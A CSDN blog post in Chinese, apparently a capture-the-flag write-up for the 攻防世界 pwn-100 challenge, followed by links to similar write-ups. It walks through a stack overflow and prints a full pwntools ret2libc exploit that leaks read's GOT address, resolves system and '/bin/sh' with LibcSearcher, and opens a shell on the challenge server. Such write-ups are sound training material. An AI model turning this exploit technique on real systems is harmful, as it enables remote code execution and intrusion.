攻防世界 pwn-100

已于 2023-03-20 18:37:09 修改
阅读量333 收藏
点赞数
分类专栏: pwn题 文章标签: 安全 系统安全 网络安全 linux
于 2023-03-20 18:13:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56777139/article/details/129503947
版权

题目链接

checksec

在这里插入图片描述
没有CANARY与PIE

IDA

主函数
在这里插入图片描述
sub_40068E函数
在这里插入图片描述
sub_40063D()函数
在这里插入图片描述

分析

明显的存在栈溢出漏洞,sub_40063D函数输入时,能输入的长度远大于v1数组的长度
首先利用漏洞构造payload来泄露出got表内容

from pwn import *
p=remote('61.147.171.105',57920)
elf=ELF('./pwn-100')
read_plt=elf.plt['read']
read_got=elf.got['read']
puts_plt=elf.plt['puts']
pop_rdi=0x400763
main_addr=0x4006B8
payload=b'a'*0x40+b'a'*8+p64(pop_rdi)+p64(read_got)+p64(puts_plt)+p64(main_addr)

此时即可接收泄露的内容

payload=payload.ljust(200,b'a')
p.send(payload)
p.recvuntil('bye~\n')
read_addr=u64(p.recv(6).ljust(8,b'\x00'))

此处有一处值得一提,发送payload时注意sendline和send,sendline会自动在200个字符后加’\n’,缓冲区内则为200个字符加’\n’的形式,当复制200个字符串后返回主函数地址,缓冲区内还有’\n’,而主函数没有刷新缓冲区,所以返回主函数后进入下一轮的复制函数会将缓冲区头部的’\n’复制到内存中。此时如若我们忽略此细节,忘记缓冲区内有一字符,下一轮构造的开头复制的b’a’仍为0x40+0x8个,那么就会产生错误

然后就可以利用LibcSearcher,查找system与bin_sh地址

from LibcSearcher import *
libc = LibcSearcher("read",read_addr)
libc_base=read_addr-libc.dump('read')
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')

构造新的payload,注意上述说的sendline和send对于此处的影响,若之前处用的sendline,那此处b’a’数量为0x48-1=0x47即可

payload=b'a'*0x48+p64(pop_rdi)+p64(bin_sh)+p64(system)
payload=payload.ljust(200,b'a')

发送即可

p.sendline(payload)
p.interactive()

exp

from pwn import *
from LibcSearcher import *

p=remote('61.147.171.105',57920)

elf=ELF('./pwn-100')
read_plt=elf.plt['read']
read_got=elf.got['read']
puts_plt=elf.plt['puts']
pop_rdi=0x400763
main_addr=0x4006B8

payload=b'a'*0x40+b'a'*8+p64(pop_rdi)+p64(read_got)+p64(puts_plt)+p64(main_addr)

payload=payload.ljust(200,b'a')
p.send(payload)
p.recvuntil('bye~\n')
read_addr=u64(p.recv(6).ljust(8,b'\x00'))

libc = LibcSearcher("read",read_addr)
libc_base=read_addr-libc.dump('read')
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')

payload=b'a'*0x48+p64(pop_rdi)+p64(bin_sh)+p64(system)
payload=payload.ljust(200,b'a')
p.sendline(payload)
p.interactive()
Zzzzzz!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 400
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
攻防世界-pwn pwn-100(ROP)
菜的只能随便写写博客
11-05 2939
此题是LCTF 2016年的pwn100 参考文章:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&ctid=157 0x01 文件分析 64位elf 无stack 无PIE   0x02 运行分析  看起来像一个无限循环,不断接收输入。   0x03 静态分析 main: sub_40068E: ...
攻防世界 pwn--pwn-100
YANG12345_6的博客
11-28 3295
一、checksec一下 开启了NX 二、 file一下,查看文件属性 64位文件 三、执行 让用户不断输入 四、拖进ida里分析看反汇编代码 主要代码: 数组v1的大小是0x40,后面利用的read函数的size是0xC8,有栈溢出漏洞 五、在ida里没有找到可以利用的system("bin/sh)和system("cat flag") 六、原程序中没有调用system函数,在GOT和PLT表中没有随system函数的记录,只能从libc中寻找system函数 有puts和read函数,可以利用
攻防世界pwn-100(两种方法)详细分析
qy201706的博客
05-05 1783
这题是比较基础的构造ROP链也比较典型,本菜鸡学了受益匪浅(っ °Д °;)っ 0x1 checksec + file 0x2 拖进ida分析程序: 显然应该进sub_40068E里看看: 鸭儿,继续进sub_40063D(v1,200): 这里就是一个for循环,每次向 i + a1(即:i + v1)所指的内存读取输入1个字节,i 不能大于200 貌似无懈可击,返回去查...
攻防世界pwn100 详细的WP
Zarcs_233的博客
01-20 808
pwn萌新做pwn题了 首先checksec shellcode肯定是行不通了 IDA打开看看 发现有个函数,读取200字节,但a1数组却只有40字节,出现了栈溢出漏洞,那么EIP就是在48字节之后的八个字节 查看程序导入,发现没有system,查看string,发现没有’/bin/sh’ 所以要先想办法泄露system的地址,用Dynelf即可,那么如何写泄露函数呢? 由于是64位系统,所以得...
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
browser-pwn-advent-calendar
05-28
总的来说,Browser Pwn Advent Calendar提供了一个互动的学习平台,让参与者能够提升在JavaScript和浏览器安全领域的技能,通过实践来应对现实世界中的威胁。通过完成这些挑战,不仅可以增强对浏览器漏洞的理解,也...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
Sokoban_Game:推箱子游戏
06-27
推箱子_游戏 推箱子游戏 用Java语言开发来模拟推箱子游戏。 该项目包括在每个控制台用 Java 语言模拟推箱子游戏(仓库管理器),其中包括在平面上的特定点放置盒子,为此需要实现各种数据结构和分辨率算法,以提供...
攻防世界hello pwn WP(pwn入门基础题)
m0_62584974的博客
11-21 2032
攻防世界hello pwn WP(pwn入门基础题)的简单讲解
攻防世界-pwn-100-Writeup
SkYe's Blog
05-15 379
pwn-100 [collapse title=“展开查看详情” status=“false”] 考点:栈溢出、ROP 这个栈溢出每次固定要求输入 200 个字符,也没有别的了。 ROP 操作也不需要往 bss 写入 /bin/sh ,直接在 libc 找一个就好了。(看到网上有这样的操作orz) #encoding:utf-8 from pwn import * context.log_level = 'debug' context(os='linux',arch='amd64') p = remot
攻防世界 pwn100&&pwn200
weixin_45677731的博客
05-18 199
pwn100 拖进ida分析,主要如下: 我的基本思路就是,利用栈溢出,通过puts函数,泄露read函数的地址,通过工具来得到相应的libc版本,返回main函数,进行第二次溢出然后进行攻击 第一次溢出: 由于程序为64位程序,而64位程序的前七个参数是放在寄存器中的,第一个参数是放在rdi寄存器中的,因此,我们要先找到相应的gadgets 我们要用的就是这个了 然后,把read的got地址传入,调用puts函数,返回main函数 第二次溢出: 得到read函数的地址后,通过相应的工具得到对应的li
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1346
学习pwn开始,慢慢来不要急
攻防世界pwn高手进阶(持续更新)
qq_42988973的博客
12-16 500
攻防世界pwn高手进阶wp
pwn100 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列16
重新启程
12-23 1279
题目地址:pwn100 本题已经是高手进阶区的第五题了,难度也在不断加大。需要补充的知识点也越来越多了。 废话不说,看看题目 没什么建议和描述,那就先下载附件,看看保护机制 root@mypwn:/ctf/work/python/pwn-100# checksec d0b5f9b486bb480c9035839ec896252e [*] '/ctf/work/python/pwn-10...
攻防世界PWN进阶区pwn100/pwn200/warmup
weixin_45461609的博客
05-12 492
攻防世界PWN进阶区pwn200pwn100 pwn200 和CTFWIKI上的ret2libc3大同小异。 条件: 1.有read(),write()函数,无system。 2.在函数sub_8048484中存在栈溢出。 思路: 1.通过栈溢出调用write()函数泄露write()对应的 got 表项的内容,此处将write函数的返回地址设置为main或者sub_8048484的地址以便再次利用栈溢出漏洞 2.通过LibcSearcher获取libc版本 3.获取system函数,”/bi
xctf攻防世界pwn基础题解(新手食用)
热门推荐
Spwpun的博客
05-01 2万+
文章目录CGFsb status:updating… CGFsb 前面的那一道get_shell的题算是做pwn题的一般流程:下载文件,ida查看代码,分析漏洞,利用漏洞写出exp,最常用的是用到python的pwntools,然后使用nc或者pwntools连接到虚拟场景实现漏洞攻击得到flag。 本题的思路基本一致,使用pwntools编写漏洞利用脚本,这里的漏洞是格式化字符串漏洞,文章分...
LCTF 2016-pwn100 从一道题悟出的知识
qq_41071646的博客
01-20 1370
这道题可是让我吃尽了苦头啊~~~~~~  这道题没有像那么复杂 可是就是一直做不出来。。。。。。。。。。。 先说一下 参考的资料吧  https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&highlight=pwn 感谢i春秋的师傅   如果哪里不对 还请指教 首先这道题是 64位  那么 我们知道 x86...
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值